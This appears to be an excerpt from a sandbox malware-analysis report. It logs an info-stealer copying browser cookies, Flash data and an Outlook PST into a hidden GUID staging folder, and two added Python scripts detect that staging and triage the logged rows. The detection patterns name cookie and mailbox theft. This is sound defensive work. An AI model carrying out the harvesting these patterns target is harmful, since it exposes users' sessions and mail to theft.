SSDeep: 6:MFOKZSgnlhWgW5GLsCkyRiENBH0fQ5kQbJRtAt/HP8y1AUaUKm5wXn:0lraFlyRiENBUoFbJIBv8ySm6Xn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\JQOCYKOH.txt 0.99 KB MD5: 72ea382b36198a27148aab5f1d348dcf
SHA1: a54832a578317e2d3faee12ca664fd9e8ea355ed
SHA256: 0e3df950902b1ab87598b3ce3d757c02cc2b0a315185c3349afc7553bf917cb8
SSDeep: 24:YTfyr8b1S4XaWX6j05X6tX0/eX6OkMX0bX637Xxb3Q1XRd50KHVKkXRWHVKkX6Oz:Qr1/XzX6jIX6tX/X6OrX+X637X5g1XRC
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MM8KB9U2.txt 0.42 KB MD5: 5cc2e105ff2d69d964117649bd67160d
SHA1: b087f166166accb1cbbb309c1050d3a7aa8467c8
SHA256: 1cad1bbc79f2dc24c368b0bc1080a4253f11682b458d6b103d060e16966db4ba
SSDeep: 12:9/NQAHX+JQo3Tu9UI30fOO7iIlEd3lmotBN+sADvG4QO8XEp0O3Tu8kXn:9/NQAHdo3T6r2C1vBN+sSv1QO8XrO3Tc
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\D9QO3KHK.txt 0.26 KB MD5: dd992b32063ca9d838df6c853fc671db
SHA1: 421ee2107e0372866ef3c3970ced55a546bf6101
SHA256: 437027be071e1dc7e108adf484bee7e1df18497ba2cb1d3844588761093c0b75
SSDeep: 6:LnLF/XCoVTyeAIrMz/XIJ/FloVTX9BEbZXn:Lp/bV9AIAz/X0/4V79AXn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\E978TFRK.txt 0.15 KB MD5: 6be44de3554a12014e26570be04bdf1a
SHA1: 44fabc96184d0d045b87d05d50efe49b21b626dc
SHA256: 5f704f35e7f3fd56e614b8d32993735b5108eea115810deaa3592ce837c1648d
SSDeep: 3:y8v0GGLd/v7YcJsFXPq4cavXLTMb8TEd/v7YcYTlRZ78X3JcavXn:30RLdPstGkXkOEdSThoukXn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\RYK7X1K4.txt 0.11 KB MD5: 940ca1bd61c2553cd9f95a93edc5997e
SHA1: 739c28b26f326039315b87eb7d0932bd85d59d88
SHA256: bd86c349ecf385b282c4b93d35ecef3e06e1c0ecc6ba9d51221942d4c108ccc9
SSDeep: 3:1GfFlDZkSDsdmAzu5XuTYelbST/6rUdTOLRCvXn:1GbZOiQGnROLWXn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AFMRGRY.txt 0.20 KB MD5: e763ee15bebb2fc6de2a805d11c0ad7f
SHA1: 8d98b94aeb2f51e4410aebc229b7329d207a20cc
SHA256: 452f9dba8ffafb071850743f0b0b9f708c7799ab8f9b8f89df55adca18d86f46
SSDeep: 3:oiRSHddSVIq9DeFWVNDh0Xv7YZVH2ST/J+RaR47CvXWW5+djSoIDh0Xv7YZVH2S+:DS9dYIogSpdFTf4wXWW5ijSdFTR7gXn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\TFCJHLEI.txt 0.21 KB MD5: cf2137c36db861ac3451b0e44da7d996
SHA1: c56e668e1a8c9d2cc41344c2d848f881b6f04732
SHA256: 4dbd03091b1d18a4f91015af52467c40904ffe5da0d53302ff8b831786c5aef6
SSDeep: 3:8MrvwWWQDjSxQ7XFIyTKPv7Ycyl1XPJL9vWLRCvXRFA6riZ6cvUA/0dSIyTKPv7I:jqWjS2ph5ld7W6XuELA/kSh5ldZc5wXn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\2XBM2EDN.txt 0.20 KB MD5: 8b51a9ad393e18f9c0bce2e94aafa770
SHA1: 9027543e02b28a0fffaba18cb64848f69fa0622d
SHA256: df7ff86575bd65cd23454aa9eaab24755016d5d30c7141ae12b8da3634a6f3d1
SSDeep: 6:s8nqs2S8jaKTyn/LVUSO96N/DArqp38rkUOTWHbpcv:s8z2S8BynzV26N7+qNdRTW74
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LFQZEOH.txt 0.11 KB MD5: 695b6df8ace37000ebcdd4a5ccc58f60
SHA1: c05ce4eac17bf4fe26ed646fcdb44a6fc0572b7b
SHA256: 673dc8663a4527c3941c4b83ab3902ca79cb9a606635c82fbfed5eaa54ae04e3
SSDeep: 3:CqEXjFDJT6pch/0E4XvilbGTKPv7YeGSUts9P8dTUCvXn:iXjFdTh/OXvzKaE8RXXn
YARA Match: False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\XNW1G0SM.txt 0.11 KB MD5: 0584bb7512a9cfa5ceae7af231835286
SHA1: d2503f883f6ff49ccabb5100ea965c79a5dd48ff
SHA256: f1fa017a59ba4d40e1f63c55343cadf1ea6414c932aabe1c4a86adc5813038f6
SSDeep: 3:KOXPGo3jX6uYOH3XiO4I8VXJRQVvWx5XZ6QcRUVBvn:vXPG2jnlniFPVXfoaXZ6QcRULn
YARA Match: False
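Every dropped file listed above sits under C:\Users\<user>\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie, a GUID-named folder the sample creates to stage copies of the victim's Internet Explorer cookies (the File operations further down show cookie.ff and sols siblings for Firefox and Flash data). A host-side check for that staging layout, written as an added example for this page and not taken from the VMRay report or from the sample, is the Python below: it walks an AppData\Roaming\Microsoft directory, reports only GUID-named folders that contain one of the marker sub-folders seen here, and hashes their contents so they can be compared with the SHA256 values above. The marker set, the function names and the profile tree it scans (built in a temporary directory) are my own constructions.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# A GUID-named folder directly under %APPDATA%\Microsoft, shaped like
# {24A75F92-33C8-F66F-DD98-178A614C3B5E} from the report.
GUID_DIR = re.compile(
    r"^\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}$", re.I
)
# Sub-folder names the sample creates inside that folder while staging
# browser data (IE cookies, Firefox profile copy, Flash .sol files).
# Assumption: this marker set is mine, derived from the report's paths.
STAGING_MARKERS = {"cookie.ie", "cookie.ff", "sols"}


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large staged files are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_staging_dirs(appdata_microsoft):
    """Map each suspicious GUID folder name to a list of
    (relative path, size in bytes, sha256) for every file it holds.

    A GUID folder is reported only if it contains at least one of the
    STAGING_MARKERS sub-folders; other GUID folders (legitimate Microsoft
    components use them too) are ignored to keep false positives down."""
    hits = {}
    root = Path(appdata_microsoft)
    if not root.is_dir():
        return hits
    for entry in sorted(root.iterdir()):
        if not entry.is_dir() or not GUID_DIR.match(entry.name):
            continue
        subdirs = {child.name.lower() for child in entry.iterdir() if child.is_dir()}
        if not subdirs & STAGING_MARKERS:
            continue
        files = []
        for path in sorted(entry.rglob("*")):
            if path.is_file():
                files.append(
                    (path.relative_to(entry).as_posix(), path.stat().st_size, sha256_file(path))
                )
        hits[entry.name] = files
    return hits


def build_sample_profile():
    """Constructed sample (not from a real host): a fake %APPDATA%\\Microsoft
    tree in a temp dir with one staging folder laid out like the report's
    and one benign GUID folder that must not be reported."""
    base = Path(tempfile.mkdtemp(prefix="appdata_microsoft_"))
    staging = base / "{24A75F92-33C8-F66F-DD98-178A614C3B5E}"
    ie = staging / "cookie.ie" / "Low"
    ff = staging / "cookie.ff" / "8i341t8m.default"
    sol = staging / "sols" / "macromedia.com" / "support" / "flashplayer" / "sys"
    for d in (ie, ff, sol):
        d.mkdir(parents=True)
    (ie / "CC7DS78R.txt").write_bytes(b"sample-cookie-1\n")      # 16 bytes
    (ff / "cookies.sqlite").write_bytes(b"SQLite format 3\x00")  # 16 bytes
    (sol / "settings.sol").write_bytes(b"\x00\xbf")               # 2 bytes
    benign = base / "{0F2A1C3D-1111-2222-3333-444455556666}"
    (benign / "Cache").mkdir(parents=True)
    (benign / "Cache" / "index.dat").write_bytes(b"x")
    return base


if __name__ == "__main__":
    for guid, files in find_staging_dirs(build_sample_profile()).items():
        print(f"staging folder {guid}: {len(files)} file(s)")
        for rel, size, digest in files:
            print(f"  {rel}  {size} B  sha256={digest}")
```

On a live host, point find_staging_dirs at C:\Users\<user>\AppData\Roaming\Microsoft for each profile; the returned hashes can be matched against the dropped-file list above, and any file whose hash also appears in the user's own INetCookies folder confirms the copy rather than a coincidental name.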
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\counters.dat 0.12 KB MD5: 0fc07622856a4f02ec32f3b8cdc7d79a
SHA1: 69227fbe52d3fbfa3af508fee363698fd2a3613c
SHA256: 0ac6eba5d515f5a55c7d5bd712cb191aac9bbef780cac77f3a69e357d8c3d746
SSDeep: 3:/lV/l3l:d
YARA Match: False
Host Behavior
COM (1)
Operation Class Interface Additional Information Success Count
Create 3C374A40-BAE4-11CF-BF7D-00AA006946EE (CLSID_CUrlHistory, the Internet Explorer URL history store) AFA0DC11-C313-11D0-831A-00C04FD5AE38 (IID_IUrlHistoryStg2) cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
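The File operations that follow document the harvesting routine step by step: a CreateFile on the Outlook PST, Get Info probes of the Firefox and Chrome cookie stores, CreateDirectory on the GUID staging folder repeated before each copy (and failing, because the folder already exists, hence the counts of 110 and 117), and one Copy per IE cookie, Firefox cookies.sqlite and Flash settings.sol into that folder; the COM object above is the Internet Explorer URL history store, so browsing history is enumerated as well. The Python below is an added example, not part of the VMRay report or of the sample, that turns rows of this kind into a triage verdict: it parses the flattened row layout used on this page (Operation, Filename, Additional Information, Success, Count), classifies each read or copied path by the store it belongs to, and records staging roots, named pipes and repeated CreateDirectory failures. The category names, the staging-root pattern and the triage function are my own; SAMPLE_ROWS is constructed from rows on this page plus one benign copy that must stay unflagged.

```python
import re
from collections import Counter

# Constructed sample input: rows copied in shape from this report's File
# operations table, plus one benign Copy (report.docx) that must not be flagged.
SAMPLE_ROWS = r"""
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create \\.\pipe\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299} desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OVERLAPPED True 1
Create C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low - False 110
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies type = file_attributes True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\\8i341t8m.default\cookies.sqlite source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer\sys\settings.sol source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\CC7DS78R.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\CC7DS78R.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\B67M68H4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B67M68H4.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\Documents\report.docx source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\report.docx True 1
""".strip().splitlines()

# Row grammar as flattened on this page: <Operation> <Filename> <Additional Information> <Success> <Count>
ROW = re.compile(
    r"^(?P<op>Create Directory|Create Temp File|Create Pipe|Create|Get Info|Copy)\s+"
    r"(?P<rest>.+?)\s+(?P<ok>True|False)\s+(?P<count>\d+)$"
)

# Stores worth flagging when read or copied (category names are my own).
SOURCE_CATEGORIES = [
    ("ie_cookies", re.compile(r"\\INetCookies\\", re.I)),
    ("firefox_cookies", re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$", re.I)),
    ("chrome_cookies", re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Cookies$", re.I)),
    ("flash_sol", re.compile(r"\\Macromedia\\Flash Player\\.*\.sol$", re.I)),
    ("outlook_pst", re.compile(r"\.pst$", re.I)),
]
# Staging location seen in the report: a GUID-named folder directly under %APPDATA%\Microsoft.
STAGING_ROOT = re.compile(r"^(.*\\AppData\\Roaming\\Microsoft\\\{[0-9A-F-]{36}\})\\", re.I)


def split_rest(rest):
    """Split '<filename> <key = value, ...>' at the first 'key = ' token;
    filenames may contain spaces, keys never do. '-' means no extra info."""
    if rest.endswith(" -"):
        return rest[:-2], "-"
    m = re.search(r"\s(\w+) = ", rest)
    if not m:
        return rest, ""
    return rest[: m.start()], rest[m.start() + 1:]


def parse_row(line):
    m = ROW.match(line.strip())
    if not m:
        return None
    filename, info = split_rest(m.group("rest"))
    return {"op": m.group("op"), "filename": filename, "info": info,
            "ok": m.group("ok") == "True", "count": int(m.group("count"))}


def classify(path):
    for name, pattern in SOURCE_CATEGORIES:
        if pattern.search(path):
            return name
    return None


def staging_root(path):
    m = STAGING_ROOT.match(path)
    return m.group(1) if m else None


def triage(rows):
    """Summarise harvesting indicators across a list of file-operation rows."""
    summary = {
        "by_source": Counter(),         # cookie/mail stores read or copied, per category
        "staged_copies": 0,             # copies whose destination is a GUID staging folder
        "staging_roots": set(),
        "named_pipes": [],
        "repeated_mkdir_failures": [],  # CreateDirectory on an existing folder, many times
    }
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        op, name, info = row["op"], row["filename"], row["info"]
        if op == "Copy" and info.startswith("source_filename = "):
            src = info[len("source_filename = "):]
            cat = classify(src)
            if cat:
                summary["by_source"][cat] += 1
            root = staging_root(name)
            if root:
                summary["staged_copies"] += 1
                summary["staging_roots"].add(root)
        elif op in ("Create", "Get Info"):
            cat = classify(name)
            if cat:
                summary["by_source"][cat] += 1
            if op == "Create" and name.lower().startswith("\\\\.\\pipe\\"):
                summary["named_pipes"].append(name)
        elif op == "Create Directory" and not row["ok"] and row["count"] > 1:
            summary["repeated_mkdir_failures"].append((name, row["count"]))
    stores = sum(summary["by_source"].values())
    summary["verdict"] = (
        "browser/mail data harvested into a staging folder"
        if summary["staged_copies"] and stores >= 3
        else "no harvesting pattern"
    )
    return summary


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

The threshold of three distinct store accesses plus at least one staged copy is a choice for this report's shape, not a general rule; a single Copy of cookies.sqlite by a backup tool would not trip it, while the sample's dozens of INetCookies copies into a GUID folder do.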
File (880)
Operation Filename Additional Information Success Count
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create \\.\pipe\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299} desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OVERLAPPED True 1
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4} desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827}\01D4756785E0F97F09 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E} - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\ - False 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\\8i341t8m.default - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer\sys - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie - False 117
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low - True 1
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low - False 110
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827} - True 1
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\2314.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Create Pipe pipe\{072bb6f5-baec-d114-fc2b-8e95f08fa299} open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_TYPE_MESSAGE, max_instances = 255 True 1
Get Info C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1 type = file_attributes True 3
Get Info C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\01D4756785E0F97F09 type = file_attributes True 1
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\ type = file_attributes True 1
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite type = file_attributes False 1
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\ type = file_attributes True 1
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\Cache\ type = file_attributes False 1
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\ type = file_attributes True 1
Get Info C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies type = file_attributes True 1
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin type = size True 1
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin type = size True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ff\\8i341t8m.default\cookies.sqlite source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\sols\macromedia.com\support\flashplayer\sys\settings.sol source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\2XBM2EDN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\2XBM2EDN.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\8489XH4E.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\8489XH4E.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\B4K109K7.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B4K109K7.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\B67M68H4.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\B67M68H4.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\OOUVZSZN.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\OOUVZSZN.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\TIGZFGLM.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\TIGZFGLM.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\XNW1G0SM.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\XNW1G0SM.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0GHTMU6X.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0GHTMU6X.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0MDKR34W.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0MDKR34W.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\0Z1JIEVI.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\0Z1JIEVI.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\16DOE15M.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\16DOE15M.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\16Y0X4V7.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\16Y0X4V7.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1L3KU69N.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1L3KU69N.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LFQZEOH.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1LFQZEOH.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1LLUY7B7.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1LLUY7B7.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\1UYN2RFY.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\1UYN2RFY.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\23JC2UTD.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\23JC2UTD.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\2EQ4E2OJ.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\2EQ4E2OJ.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\2HYILE1O.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\2HYILE1O.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\3RW4K76X.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\3RW4K76X.txt True 1
Copy C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\3VVSZ2CO.txt source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\INetCookies\Low\3VVSZ2CO.txt True 1
